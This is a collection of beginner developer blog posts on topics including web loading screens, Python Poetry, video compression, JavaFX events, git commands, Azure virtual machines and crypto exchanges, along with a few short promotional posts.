1,899,330 | How to Quickly Add a Loading Screen onto your website! | Brief talk about loading screens When you're making a website, the more data and lines of... | 0 | 2024-06-24T20:05:39 | https://dev.to/lensco825/how-to-quickly-add-a-loading-screen-onto-your-website-7ga | beginners, tutorial, javascript, webdev | ## Brief talk about loading screens
When you're making a website, the more data and lines of code you have the longer it takes for a computer to load a website fully. While it's loading, it can be confusing to a user as to why things are blank or unorganized. This is why loading screens are used, to not only give time for the website to load but to also let the user know the website is loading. Even if you have a fast computer, it's important to sympathize with users who have slower devices or network speeds. Which is why in this tutorial, I'll show how to make a loading screen with HTML, CSS, and JS. I'll be using a loading screen from my [audio player web project](https://soundscape-lyart.vercel.app/) as an example.
**Note: This blog focuses more on implementing a loading screen than stylizing it to look good, you can put whatever you want in your loading screen!**
<hr>
## Creating a Loading screen
First, we have to make a loading screen with HTML. Use a `div` element and add whatever content you want to have in your loading screen inside it. It could be text that says "loading" or a loading icon.
```html
<div class="loadingScreen">
<!--My content is the word "soundscape" but the o is replaced with a disc-->
<h1>S<img src="compact-disc-with-glare.png" alt="disc" />undscape</h1>
</div>
```
Now we have to make sure the loading screen covers the entire page using CSS. Set its `position` to `absolute` so it isn't affected by anything in the HTML file, then set its `z-index` to any high number as long as it's above all other elements on the page. Finally, set its width and height to `100%` of `100vh` if that doesn't work.
```CSS
.loadingScreen {
position: absolute;
z-index: 5;
width: 100%;
height: 100vh;
background-color: white;
display: flex;
align-items: center;
justify-content: center;
}
```
_Note: If the width and height are unable to fill up the webpage make sure the width and height of the html and body are set to `100%` as well._
<br>
You can also stylize your loading screen and add animations, in my loading screen the disc rotates.
{% codepen https://codepen.io/lensco825/pen/pomKEbK %}
<hr>
## Making the loading screen disappear
This only needs 3 lines of JavaScript. First, you have to store you're loading screen in a variable.
```js
var loadingScreen = document.querySelector(".loadingScreen");
```
After that give the `window` property an event listener. The window property refers to the full website and everything in it (To learn more about it [click here](https://developer.mozilla.org/en-US/docs/Web/API/Window/window)). Make sure the event listener uses the `load` event which makes it so the event happens when everything has loaded. Finally, inside the event listener set the CSS display property of the loading screen to none.
```js
window.addEventListener('load', function() {
loadingScreen.style.display = 'none';
})
```
<br>
If you have a fast computer your loading screen will only show in a second or less, and that's fine! That means your phone or PC is incredibly fast and can quickly load your website in no time, however, now that you have a loading screen slower computers can be able to see it and understand that your website is loading.
<hr>
Thank you for reading my tutorial blog, have a good day/night👋. | lensco825 |
1,894,810 | Poetry: O Maestro dos Projetos Python 🎩✨ | O Poetry é uma ferramenta de gerenciamento de dependências e empacotamento para projetos Python. Ele... | 0 | 2024-06-24T20:04:25 | https://dev.to/theleanz/poetry-o-maestro-dos-projetos-python-320l | poetry, python, programming | O Poetry é uma ferramenta de gerenciamento de dependências e empacotamento para projetos Python. Ele simplifica a criação e manutenção de projetos Python, gerenciando dependências e versões. Vamos passar por um guia passo a passo para começar a usar o Poetry em um novo projeto Python.
#### 1. Para Instalar
Para instalar o Poetry, você pode seguir as instruções presentes na [documentação oficial do Poetry](https://python-poetry.org/) para o seu sistema operacional. Nesse tutorial vamos usar o pipx para instalar o Poetry
O pipx é uma forma de instalar pacotes de forma global no seu sistema sem que eles interfiram no seu ambiente global do python. Ele cria um ambiente virtual isolado para cada ferramenta.
O guia de instalação do pipx contempla diversos sistemas operacionais: [guia](https://pipx.pypa.io/stable/installation/#installing-pipx)
Começamos com o comando:
```
pip install pipx
```
Agora usamos:
```
pipx ensurepath
```
O comando pipx ensurepath é usado garantir que os pacotes instalados via pipx possam ser executados diretamente do terminal.
Agora que ja temos o pipx instalado, podemos baixar o poetry.
```
pipx install poetry
```
Depois de instalar, você pode verificar a instalação executando:
```
pipx --version
```
#### 2. Criar um Novo Projeto
Para criar um novo projeto com o Poetry, navegue até o diretório onde deseja criar o projeto e execute:
```
poetry new nome_do_projeto
```
Isso cria a seguinte estrutura de diretórios:
```
nome_do_projeto/
├── pyproject.toml
├── README.rst
├── nome_do_projeto
│ └── __init__.py
└── tests
└── __init__.py
```
#### 3. Entender o `pyproject.toml`
O arquivo pyproject.toml é onde você define as dependências do seu projeto, scripts de build e outras configurações. Aqui está um exemplo básico de como ele se parece:
```
[tool.poetry]
name = "nome_do_projeto"
version = "0.1.0"
description = ""
authors = ["Seu Nome <seu_email@example.com>"]
[tool.poetry.dependencies]
python = "^3.10"
[tool.poetry.dev-dependencies]
pytest = "^6.2"
```
#### 4. Adicionar Dependências
Para adicionar uma dependência ao seu projeto, use o comando poetry add:
```
poetry add requests
```
Para adicionar uma dependência de desenvolvimento (por exemplo, para testes), use:
```
poetry add --dev pytest
```
#### 5. Instalar Dependências
Para instalar todas as dependências listadas em pyproject.toml, navegue até o diretório do seu projeto e execute:
```
poetry install
```
#### 6. Ativar o Ambiente Virtual
O Poetry cria e gerencia um ambiente virtual para o seu projeto. Para ativá-lo, você pode usar:
```
poetry shell
```
<br>
#### Conclusão
Usar o Poetry facilita muito a gestão de projetos Python. Com ele, você pode criar novos projetos, adicionar dependências e configurar tudo de forma simples e organizada.
- Instalação: Você pode instalar o Poetry facilmente com pip ou pipx.
<br>
- Novo Projeto: Crie novos projetos rapidamente com `poetry new nome_do_projeto`.
<br>
- Dependências: Adicione dependências usando `poetry add` e `poetry add --dev` para dependências de desenvolvimento.
<br>
- Ambiente Virtual: Ative o ambiente virtual do projeto com `poetry shell` para trabalhar em um ambiente isolado.
<br>
Seguindo esses passos, você mantém seu projeto organizado e focado no desenvolvimento de código de qualidade. O Poetry cuida do gerenciamento de dependências e versões, permitindo que você se concentre no que realmente importa: programar!
<br>
Até a próxima 👋
| theleanz |
1,899,325 | What is Video Compression? How does it work? | Video compression is the process of reducing the file size of a video without significantly reducing... | 0 | 2024-06-24T19:56:26 | https://www.metered.ca/blog/what-is-video-compression-how-does-it-work/ | webdev, javascript, devops, beginners | Video compression is the process of reducing the file size of a video without significantly reducing its quality.
It reduces the size of the data that is required for video files. The video compression tries to reduce the file size without compromising on reduction in quality of the video
Video compression does this by removing redunded and non essential data from video files.
thus making them smaller in size without significantly reducing the quality
## **Types of Video Compression**
There are broadly two types of video compression. Each method has its own use case and advantage and disadvantages depending on what is the desired quality, file size and other aspects
Understanding these two types of video compression is important if you are working with video files compression
### **Lossy Compression**
* What it is
Lossy Compression as the word implies is type of video compression that leads to a loss in the quality of video
Here what is get in return to the loss of video quality is the great reduction in file size of the video
This is used in applications where reduction in data quality is acceptable, it is used by streaming service providers to reduce bandwidth and CPU usage on their end
#### **How it works**
Lossy compression works by simplifying the data by various means such as
* reducing the resolution of the video for example from 4k to 1080p video.
* Altering the sub sampling of colors
* Consolidating similar data points into a single average that approximates the original data
#### **Advantages**
The main advantage of lossey compression is that it greatly reduces the file size of the video.
This makes it easier to store and transmit the video over the internet
#### **Disadvantages**
The main drawback is that the quality of the video is diminished, the more lossey the compression is the smaller is the file size and worse is the quality of video
### **Lossless Compression**
Lossless compression on the other hand aloows for the orignal data to be reconstructed from the compressed data
This method is essential in situations where you need high quality video such as premium streaming providers, Blue ray disks, or medical imaging etc
#### **How it works**
lossless compression identifies and eliminates statistical redundencies without affecting the content, often using different algorithms that encode data more efficiently than video formats
#### **Advantages**
There is no loss in quality is the main advatage.
#### **Disadvantages**
The compression ratio is much lower than lossey compression thus the file size is reduced but not by much.
This means that the file sizes are much larger as compared to lossey compression.
When streaming files over the internet you need high bandwidth and cpu capacity in order to stream the video and greater disk space to store the c video, but the video is of high quality
## **Popular Video Compression Algorithms and Standards**
Several algorithms and standards are available to compress video, these algorithms are designed with different use cases and each compress video under different contraints
like some reduces the resoulution and other reduce audio quality etc.
### **H.264 (Advanced Video codec, AVC)**
this compression algorithm was introduced in 2003, H.264 is one of the most highly used video coded because it delivers good video quality with small file size, thus giving a balance between video quality and compression
Technology: The H.264 codec uses motion compensation and spatial prediction to achieve a level of high compression ratio with good quality video
Usage: H.264 is compatible with almost all platfroms and devices today, thus it is highly versatile and can be used for both high defination and standard defination video compression
### **H.265 (High Efficiency Video Coding, HVEC)**
It is a successor to the H.264, the H.265 delivers video quality that is similar to the H.264 but with smaller file size.
It delivers upto 50% percent reduction in file size, which is a good thing since video quality is getting bigger and bigger
Technology: The H.265 uses improved methods of coding blocks, motion vectors and improved spatial reduction to reduce the file size of the video
The H.265 has high computational requirements, but because it reduces the file much more and without significant loss in quality it is being widely used in the industry.
It has only one time computational requirement during compression, computational power has also become much cheaper with time.
### **VP9**
The VP9 protocol was developed by google, it is an open source and royalty free codec that has been designed with web video in mind
This codec priomarily competes with H.265
Technology: The VP9 is best at reducing the bitrate needed for high quality video, which is good for YouTube Video where there is a need for bandwidth optimization
Usage: VP9 was developed by google for web based video
## **Key Concepts in Video Compression**
### **Bitrate**
Bitrate is the amount of data that is processed per unit of time in a video file.
This data is measured in Mbps that is Megabits of data per second. Bitrate is a determinant of file size that is streaming.
A higher bitrate could mean a greater resolution video that is, all things being equal a 4k video would have a greater bitrate that 1080p, which in turn would have a greater bitrate that 720p video.
Compression techniques can reduce the bitrate while attempting to maintain as much as original quality as possible
### **Resolution**
Resolution indicates the number of pixels that can be displayed, more pixels can be a bigger video or a crisper video.
Higher resolution means more detail and clearer images the downside is that mor processing power is required to play the video and more storage space is required to store the video and more bandwidth is required to stream the video over the internet
### **Frame Rate**
A video is made up of multiple still images that are consicutive in nature and appear very fast so as to create an illusion that the images are moving and thus creates a video
the frequency at which these images appear is called as frame rate. The more the frame rate the more images are appear in a given amount of time
for example: a 24 fps video would render 24 images per second and a 60 fps video would render 60 images / frames per seconds
The better the frame rate the smoother the video and crisper the image quality. Also, more frame rate require a larger file size for the video and higher cpu and bandwidth requirements to stream and display the video
## **Encoding (Compression) and Decoding (Decompression) Video**
Encoding (Compression)
The encoding is the process of converting raw video into compressed format.
### **Temporal Compression**
The encoder looks at multiple frames to find areas in the video that do not change much and compresses these areas more efficiently.
Techniques like the motion estimator predicts the motion from one frame to another and only stores the difference between frames and not the entire frame
### **Spatial Compression**
Here the encodor looks across multiple images and sees parts of the image that are similar and compresses them by reducing detail.
This is often done using or transforming the spatial domain data into a frequency domain data using mathematical transformations like Discrete Cosine transform (DCT) .
The resulting data often contains many low values and zeros which can be eliminated and the data compressed more efficiently
### **Quantization**
This compression techniques significantly reduces the amount of data by approximating the transformed coeffients to a lower precision.
While the quantization effectively reduces the file size. It also reduces the quality significantly and also creates compression artifacts.
### **Entropy Coding**
Encoder uses coding algorithms such as the Huffman coding or the Arithematic coding to further compress the video by removing statistical redundencies, encoding frequently occuring patterns with shorter codes.
## **Decoding (Decompression)**
Decoding is the reverse process of encoding
### **Entropy decoding**
The decodier basically processes the compressed data stream to expand it back to its original state
### **Inverse Quantization**
This step reverses the quantized state to its approximate orignal data by a process called inverse quantization
### **Reconstruction**
Motion vactors and temporal data is used to reconstruct the full video sequence.
This process fills in data between keyframes where only changes where stored during compression process.
## **Importance of Video Compression in Digital Media**
here are some of the ways in which video compression is important in digital media
### **Efficiency in Storage**
High defination video files are large files and these file can consume valuable hard disk space.
For Example a single 1080p uncompressed file can consume upto 100GB in space
Compression algoritms can reduce this space usage without compromising much on quality by upto 90% which is great
This makes it easy to store the files on servers and on computer hard disks
### **Bandwidth management**
Streaming video requires a lot of bandwidth, this is important perticularly when you are streaming high defination video.
Many people also stream on mobile devices which inherently do not have a lot of bandwidth
With compresssion the amount of data being transmitted is reduced significantly which in turn reduces bandwidth consumti0n
This makes streaming smoother for end user and also saves money to the streaming service and the internet service provider as well.
### **Cost Effectiveness**
Reducing the size of the video helps in storage as well as transmission of video files over the internet
This in turn saves money for the businesses operating in this field such as streaming service providers like Netflix or YouTube, internet service providers
### **Scalability**
As the demand for video content is growing, video compression has become essential so as to scale to millions of users
It allows platforms to host milllions of users with streaming more videos and audio and even allow users to stream content with limited internet speed.

## [**Metered TURN servers**](https://www.metered.ca/stun-turn)
1. **API**[**:**](https://www.metered.ca/stun-turn) TURN server management with powerful API. You can do things like Add/ Remove credentials via the API, Retrieve Per User / Credentials and User metrics via the API, Enable/ Disable credentials via the API, Retrive Usage data by date via the API.
2. **Global Geo-Location targeting:** Automatically directs traffic to the nearest servers, for lowest possible latency and highest quality performance. less than 50 ms latency anywhere around the world
3. **Servers in all the Regions of the world:** Toronto, Miami, San Francisco, Amsterdam, London, Frankfurt, Bangalore, Singapore,Sydney, Seoul, Dallas, New York
4. **Low Latency:** less than 50 ms latency, anywhere across the world.
5. **Cost-Effective:** pay-as-you-go pricing with bandwidth and volume discounts available.
6. **Easy Administration:** Get usage logs, emails when accounts reach threshold limits, billing records and email and phone support.
7. **Standards Compliant:** Conforms to RFCs 5389, 5769, 5780, 5766, 6062, 6156, 5245, 5768, 6336, 6544, 5928 over UDP, TCP, TLS, and DTLS.
8. **Multi‑Tenancy:** Create multiple credentials and separate the usage by customer, or different apps. Get Usage logs, billing records and threshold alerts.
9. **Enterprise Reliability:** 99.999% Uptime with SLA.
10. **Enterprise Scale:** With no limit on concurrent traffic or total traffic. Metered TURN Servers provide Enterprise Scalability
11. **5 GB/mo Free:** Get 5 GB every month free TURN server usage with the Free Plan
12. Runs on port 80 and 443
13. Support TURNS + SSL to allow connections through deep packet inspection firewalls.
14. Supports both TCP and UDP
15. Free Unlimited STUN | alakkadshaw |
1,899,324 | Mastering Iconography: Enhancing UX Through Visual Symbols | 👋 Hello, Dev Community! I'm Prince Chouhan, a B.Tech CSE student passionate about UI/UX design.... | 0 | 2024-06-24T19:50:59 | https://dev.to/prince_chouhan/mastering-iconography-enhancing-ux-through-visual-symbols-43in | ui, uidesign, ux, uxdesign | 👋 Hello, Dev Community!
I'm Prince Chouhan, a B.Tech CSE student passionate about UI/UX design. Today, let's explore the fascinating world of Iconography in UI design.
🗓️ Day 7 Topic: Iconography
📚 Today's Learning Highlights:
Iconography Overview:
Iconography uses visual symbols to convey ideas and actions in UI design, enhancing communication and user experience.
Forms of Icons:
- Simple geometric shapes.
- Complex designs resembling real-world objects or actions.
Benefits of Using Icons:
1. Enhanced Usability:
- Icons make interfaces intuitive and user-friendly.
- Provide quick visual cues for actions.
2. Space Saving:
- Icons occupy less space compared to text.
- Ideal for mobile and responsive designs.
3. Accessibility:
- Help users with language barriers or reading difficulties.
- Serve as alternatives to text labels.
Challenges of Using Icons:
- Poorly designed or inconsistent icons can cause confusion.
- Importance of clear and consistent design across the interface.
Types of Icons in UI Design:
1. Outline Icons:
- Visible boundary, often used in minimalist designs.
- Indicates inactive or disabled states.
2. Solid Icons:
- Filled with color, no visible boundary.
- Indicates active or enabled states.
Choosing Between Outline and Solid Icons:
- Depends on specific UI design needs.
Best Practices:
- Avoid redesigning well-known icons.
- Utilize third-party icon libraries for efficient design.\
[](url)
🔍 In-Depth Analysis:
Explored the impact of icon design on user interaction and interface clarity.
🚀 Future Learning Goals:
Next, I plan to delve deeper into advanced iconography techniques and their implementation in different UI contexts.
📢 Community Engagement:
What's your favorite icon design tip or resource? Share your thoughts!
💬 Quote of the Day:
"Good design is obvious. Great design is transparent." - Joe Sparano
Thank you for reading! Stay tuned for more updates as I continue my journey in UI/UX design.
#UIUXDesign #LearningJourney #Iconography #UXUI #UserInterface #DigitalDesign #VisualDesign #DesignThinking #UIDesignTips 🎨✨🖼️ | prince_chouhan |
1,899,320 | Registering Handlers and Handling Events | A handler is an object that must be registered with an event source object, and it must be an... | 0 | 2024-06-24T19:46:05 | https://dev.to/paulike/registering-handlers-and-handling-events-3j7e | java, programming, learning, beginners | A handler is an object that must be registered with an event source object, and it must be an instance of an appropriate event-handling interface.
Java uses a delegation-based model for event handling: a source object fires an event, and an object interested in the event handles it. The latter object is called an _event handler_ or an event _listener_. For an object to be a handler for an event on a source object, two things are needed, as shown in Figure below.

1. _The handler object must be an instance of the corresponding event-handler_ interface to ensure that the handler has the correct method for processing the event. JavaFX defines a unified handler interface **EventHandler<T extends Event>** for an event **T**. The handler interface contains the **handle(T e)** method for processing the event. For example, the handler interface for **ActionEvent** is **EventHandler<ActionEvent>**; each handler for **ActionEvent** should implement the **handle(ActionEvent e)** method for processing an **ActionEvent**.
2. _The handler object must be registered by the source object._ Registration methods depend on the event type. For **ActionEvent**, the method is **setOnAction**. For a mouse pressed event, the method is **setOnMousePressed**. For a key pressed event, the method is **setOnKeyPressed**.
Let’s revisit [here](https://dev.to/paulike/event-driven-programming-2g88), HandleEvent.java. Since a **Button** object fires **ActionEvent**, a handler object for **ActionEvent** must be an instance of **EventHandler<ActionEvent>**, so the handler class implements EventHandler<ActionEvent> in line 34. The source object
invokes setOnAction(handler) to register a handler, as follows:
`Button btOK = new Button("OK"); // Line 17 in HandleEvent.java
OKHandlerClass handler1 = new OKHandlerClass(); // Line 19 in HandleEvent.java
btOK.setOnAction(handler1); // Line 20 in HandleEvent.java`
When you click the button, the **Button** object fires an **ActionEvent** and passes it to invoke the handler’s **handle(ActionEvent)** method to handle the event. The event object contains information pertinent to the event, which can be obtained using the methods. For example, you can use **e.getSource()** to obtain the source object that fired the event.
We now write a program that uses two buttons to control the size of a circle, as shown in Figure below. We will develop this program incrementally. First, we write the program in the program below that displays the user interface with a circle in the center (lines 16-20) and two buttons on the bottom (lines 22-28).

```
package application;
import javafx.application.Application;
import javafx.geometry.Pos;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.layout.StackPane;
import javafx.scene.layout.HBox;
import javafx.scene.layout.BorderPane;
import javafx.scene.paint.Color;
import javafx.scene.shape.Circle;
import javafx.stage.Stage;
public class ControlCircleWithoutEventHandling extends Application {
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
StackPane pane = new StackPane();
Circle circle = new Circle(50);
circle.setStroke(Color.BLACK);
circle.setFill(Color.WHITE);
pane.getChildren().add(circle);
HBox hBox = new HBox();
hBox.setSpacing(10);
hBox.setAlignment(Pos.CENTER);
Button btEnlarge = new Button("Enlarge");
Button btShrink = new Button("Shrink");
hBox.getChildren().add(btEnlarge);
hBox.getChildren().add(btShrink);
BorderPane borderPane = new BorderPane();
borderPane.setCenter(pane);
borderPane.setBottom(hBox);
BorderPane.setAlignment(hBox, Pos.CENTER);
// Create a scene and place it in the stage
Scene scene = new Scene(borderPane, 200, 150);
primaryStage.setTitle("ControlCircle"); // Set the stage title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
}
public static void main(String[] args) {
Application.launch(args);
}
}
```
How do you use the buttons to enlarge or shrink the circle? When the _Enlarge_ button is clicked, you want the circle to be repainted with a larger radius. How can you accomplish this? You can expand and modify the program in the program above into one below with the following features:
1. Define a new class named **CirclePane** for displaying the circle in a pane (lines 65–81). This new class displays a circle and provides the **enlarge** and **shrink** methods for increasing and decreasing the radius of the circle (lines 74–76, 78–80). It is a good strategy to design a class to model a circle pane with supporting methods so that these related methods along with the circle are coupled in one object.
2. Create a **CirclePane** object and declare **circlePane** as a data field to reference this object (line 16) in the **ControlCircle** class. The methods in the **ControlCircle** class can now access the **CirclePane** object through this data field.
3. Define a handler class named **EnlargeHandler** that implements **EventHandler<ActionEvent>** (lines 50–55). To make the reference variable **circlePane** accessible from the **handle** method, define **EnlargeHandler** as an inner class of the **ControlCircle** class. (_Inner classes_ are defined inside another class. We use an inner class here and will introduce it fully in the next section.)
4. Register the handler for the _Enlarge_ button (line 30) and implement the **handle** method in **EnlargeHandler** to invoke **circlePane.enlarge()** (line 53).
```
package application;
import javafx.application.Application;
import javafx.event.ActionEvent;
import javafx.event.EventHandler;
import javafx.geometry.Pos;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.layout.StackPane;
import javafx.scene.layout.HBox;
import javafx.scene.layout.BorderPane;
import javafx.scene.paint.Color;
import javafx.scene.shape.Circle;
import javafx.stage.Stage;
public class ControlCircle extends Application {
private CirclePane circlePane = new CirclePane();
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
// Hold two buttons in an HBox
HBox hBox = new HBox();
hBox.setSpacing(10);
hBox.setAlignment(Pos.CENTER);
Button btEnlarge = new Button("Enlarge");
Button btShrink = new Button("Shrink");
hBox.getChildren().add(btEnlarge);
hBox.getChildren().add(btShrink);
// Create and register the handler
btEnlarge.setOnAction(new EnlargeHandler());
btShrink.setOnAction(new ShrinkHandler());
BorderPane borderPane = new BorderPane();
borderPane.setCenter(circlePane);
borderPane.setBottom(hBox);
BorderPane.setAlignment(hBox, Pos.CENTER);
// Create a scene and place it in the stage
Scene scene = new Scene(borderPane, 200, 150);
primaryStage.setTitle("ControlCircle"); // Set the stage title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
}
public static void main(String[] args) {
Application.launch(args);
}
class EnlargeHandler implements EventHandler<ActionEvent>{
@Override // Override the handle method
public void handle(ActionEvent e) {
circlePane.enlarge();
}
}
class ShrinkHandler implements EventHandler<ActionEvent>{
@Override // Override the handle method
public void handle(ActionEvent e) {
circlePane.shrink();
}
}
}
class CirclePane extends StackPane{
private Circle circle = new Circle(50);
public CirclePane() {
getChildren().add(circle);
circle.setStroke(Color.BLACK);
circle.setFill(Color.WHITE);
}
public void enlarge() {
circle.setRadius(circle.getRadius() + 2);
}
public void shrink() {
circle.setRadius(circle.getRadius() > 2 ? circle.getRadius() - 2 : circle.getRadius());
}
}
```
| paulike |
1,899,319 | Git Revert? Restore? Reset? | Git revert, restore, reset ??? Here is what they all do. Git revert Makes a commit that is... | 0 | 2024-06-24T19:43:29 | https://dev.to/jakeroggenbuck/git-revert-restore-reset-1g91 | git | Git revert, restore, reset ???
Here is what they all do.
## Git revert
Makes a commit that is the opposite changes of a specified commit.
Changes from commit `abc`
```diff
+ My name is Jake
```
`git revert abc`
Creates a commit that removes the line added in commit abc.
```diff
- My name is Jake
```
## Git reset
You can unstage changes with `git reset <filename>`.
Git reset can change the commit history to remove commits when using `--hard` so be careful with this one!
## Git restore
Git restore - restore a given file in your working tree
Want to undo an auto format for a given file?
Run `git restore <filename>` | jakeroggenbuck |
1,899,308 | A comprehensive list of resources | “Building For Everyone” - Accessibility Campaign Key event... | 0 | 2024-06-24T19:39:19 | https://dev.to/bridgesgap/a-comprehensive-list-of-resources-3219 | ## “Building For Everyone” - Accessibility Campaign
> Key event resources
1. https://developer.android.com/guide/topics/ui/accessibility
2. https://robolectric.org/javadoc/3.0/org/robolectric/annotation/AccessibilityChecks.html
3. https://developer.android.com/reference/android/support/test/espresso/contrib/AccessibilityChecks.html
4. https://developer.android.com/courses/pathways/make-your-android-app-accessible
5. https://developer.android.com/guide/topics/ui/accessibility/testing
6. https://www.udacity.com/course/web-accessibility--ud891
7. https://docs.flutter.dev/ui/accessibility-and-internationalization/accessibility
8. https://web.dev/articles/accessibility
9. https://github.com/google/Accessibility-Test-Framework-for-Android
10. https://www.youtube.com/playlist?list=PLNYkxOF6rcICWx0C9LVWWVqvHlYJyqw7g
11. https://developer.chrome.com/docs/lighthouse/overview/
12. https://m3.material.io/styles/color/system/overview
13. https://codelabs.developers.google.com/jetpack-compose-adaptability?hl=en#0
14. https://developer.android.com/codelabs/jetpack-compose-accessibility?hl=en#0
15. https://codelabs.developers.google.com/codelabs/semantic-locators?hl=en#0
16. https://codelabs.developers.google.com/angular-a11y?hl=en#0
17. https://developers.google.com/codelabs/devtools-cvd?hl=en#0
18. https://codelabs.developers.google.com/codelabs/developing-android-a11y-service?hl=en#0
19. https://developer.android.com/codelabs/a11y-testing-espresso?hl=en#0
20. https://developer.android.com/codelabs/starting-android-accessibility?hl=en#0
21. https://developer.android.com/topic/architecture
>
| bridgesgap | |
1,899,307 | Master Excel: Beginner-Friendly MS Excel Workshop | Unlock the Power of Excel: Boost Your Productivity & Save Time This workshop is your one-stop... | 0 | 2024-06-24T19:36:29 | https://dev.to/tarun_singh_af2e26ba487f6/master-excel-beginner-friendly-ms-excel-workshop-4pn9 | Unlock the Power of Excel: Boost Your Productivity & Save Time
This workshop is your one-stop shop for mastering Excel basics. Learn to:
Navigate the interface with ease
Create formulas & functions for calculations
Analyze data & present findings with clarity
Save hours with time-saving shortcuts & automation
Call to action: Invest in your future. Register for the Master [MS Excel Workshop](https://officemaster.in/microsoft-excel-using-ai-workshop/?utm_source=organic&utm_medium=SEO&utm_campaign=Backlink) | tarun_singh_af2e26ba487f6 | |
1,899,306 | 카지노커뮤니티: 게임 지식과 교류의 보물창고 | 온카달리기는 최근 인기 있는 사회적 현상으로, 인터넷 상에서 특정한 주제나 사건에 대해 다양한 사람들이 댓글이나 리뷰를 남기며 그들의 의견을 나누는 것을 말합니다. 이 용어는 주로... | 0 | 2024-06-24T19:34:17 | https://dev.to/sameer_ahmed_40f1a58b7f68/kajinokeomyuniti-geim-jisiggwa-gyoryuyi-bomulcanggo-1al5 | 온카달리기 | 온카달리기는 최근 인기 있는 사회적 현상으로, 인터넷 상에서 특정한 주제나 사건에 대해 다양한 사람들이 댓글이나 리뷰를 남기며 그들의 의견을 나누는 것을 말합니다. 이 용어는 주로 온라인 커뮤니티나 소셜 미디어에서 사용되며, 한국에서도 많은 사람들이 일상에서 온카달리기를 경험하고 있습니다.
[온카달리기](https://oncadal.com/index.php)의 배경에는 다양한 이유가 있을 수 있지만, 그 중 가장 큰 요소는 사람들이 자신의 생각과 의견을 자유롭게 표현하고 공유하고자 하는 욕구입니다. 특정한 주제에 대해 관심 있는 사람들이 모여 서로의 의견을 듣고 논의하며, 정보를 교환하는 것이 온카달리기의 핵심입니다. 이는 개인적인 관점을 넓히고 사회적인 의사소통을 촉진하는 데 기여할 수 있습니다.
하지만 온카달리기에는 부정적인 면모도 존재합니다. 때로는 다양한 의견이 충돌하거나 논란이 일어날 수 있으며, 이는 정서적인 갈등을 초래할 수 있습니다. 또한 일부 사람들은 공격적인 언행이나 모욕적인 발언을 통해 다른 사람들을 상처받게 할 수 있습니다. 이러한 문제들은 온카달리기를 함께할 때 고려해야 할 중요한 점들입니다.
온카달리기가 활발하게 이루어지는 플랫폼으로는 다음과 같은 것들이 있습니다. 소셜 미디어 플랫폼에서는 특정 해시태그 아래서 댓글을 달거나 의견을 나누기 시작합니다. | sameer_ahmed_40f1a58b7f68 |
1,899,305 | CREATING A VIRTUAL MACHINE USING AZURE QUICKSTART TEMPLATE | Azure QuickStart templates serve as a foundation for installing particular solutions or applications... | 27,629 | 2024-06-24T19:28:56 | https://dev.to/aizeon/creating-a-virtual-machine-using-azure-quickstart-template-keb | beginners, tutorial, azure, virtualmachine | Azure QuickStart templates serve as a foundation for installing particular solutions or applications on Azure. They are pre-configured Azure Resource Manager (ARM) templates. These templates offer a pre-defined configuration that can be quickly customised to match unique needs, saving time and making the deployment process simpler.
QuickStart templates can be used for web applications, databases, virtual machines, networking configurations, IoT and more solutions in Microsoft Azure.
For today, we will be using a QuickStart template to create a Windows VM.
## **PREREQUISITE**
- Working computer
- Internet connection
- Microsoft Azure account + active subscription
## **PROCEDURE**
### **LOCATE THE CUSTOM DEPLOYMENT SERVICE**
Open the Azure portal and type “QuickStart template” in the search bar at the top. Click on “Deploy a custom template” as seen in the image below.

### **SPECIFYING VM BASIC DETAILS**
On the Custom deployment webpage that loads, select a template as shown in the image below.

Enter basic VM details like resource group, region, admin username and password in the “Basic” section. Leave all other parameters as default. Move to the “Review + create” section by clicking on the button that says “Review + create”.

Wait for final validation. After successful validation, scroll downwards and click on the “Create” button. There will be a pop-up at the top right showing the status of the deployment.



You will be directed to a “Microsoft.Template” page which goes through several phases that you might need to be patient for.

Click on “Go to resource group”.

### **CONNECT TO THE VM RESOURCE**
On the resource group page, you can view the list of deployed resources in your resource group.
Search for the virtual machine resource in the list and click on it to view.

On the VM resource page, click on “Connect”.

After the Connect page loads, click on “Select”. You should notice a pop-up on the right hand side of the screen.

Wait for the box beneath “Public IP address XXX.XX.XXX.XXX” to transition from “Validating” to “Configured”. Then download the RDP file-this will be used to load the Windows VM.

Load the downloaded file and click on “Connect” on the window that pops up.

Input your password in the next window and affirm on the next couple of windows.



At this point, a VM should be running on your computer.

We will be going further by installing a Web server role on this VM using PowerShell.
In the VM, click on the Start Menu icon and search for “Windows PowerShell”.

Input this command `Install-WindowsFeature -Name Web-Server -IncludeManagementTools` in the PowerShell environment. You should get results as shown in the image below.



To test this, head back to the “Connect” page of the VM on Azure portal and copy the “Public IP address” as it will come in handy soon.

Navigate to the network settings of the VM as shown.

On the loaded page, create an inbound port rule using a destination port range of “80” (as we will be trying to connect to a HTTP protocol). Click on “Add”.


Open a blank browser window and input the “Public IP address” that was copied earlier. Then, search.

You should have a Windows Server IIS page loaded as shown below.

_Quick and easy, isn't it??_
| aizeon |
1,899,304 | Centralized Exchange Development: A Comprehensive Guide | Introduction Cryptocurrencies have revolutionized the financial landscape, offering a... | 27,673 | 2024-06-24T19:28:22 | https://dev.to/rapidinnovation/centralized-exchange-development-a-comprehensive-guide-2f7o | ## Introduction
Cryptocurrencies have revolutionized the financial landscape, offering a new
way of thinking about money, assets, and exchanges. Centralized exchanges
(CEXs) play a pivotal role in this ecosystem, acting as the primary gateways
for cryptocurrency trading and investment.
## What is Centralized Exchange Development?
Centralized Exchange Development refers to the process of creating a platform
where users can trade cryptocurrencies or other assets in a controlled
environment. These exchanges are managed by a central authority which oversees
all transactions, ensuring security, liquidity, and compliance with regulatory
frameworks.
## Types of Centralized Exchanges
Centralized exchanges can be categorized into three types:
## Benefits of Centralized Exchanges
Centralized exchanges offer several advantages:
## Challenges in Centralized Exchange Development
Developing a centralized exchange comes with its set of challenges, including:
## How Centralized Exchanges are Developed
The development process involves:
## Future of Centralized Exchanges
The future of CEXs is expected to be driven by:
## Real-World Examples of Centralized Exchanges
Some prominent examples include:
## Conclusion
Centralized exchanges have played a pivotal role in the development and
adoption of cryptocurrencies by offering a secure, regulated environment for
trading digital assets. Rapid innovation is crucial for the advancement of
these platforms, enhancing their efficiency, security, and user experience.
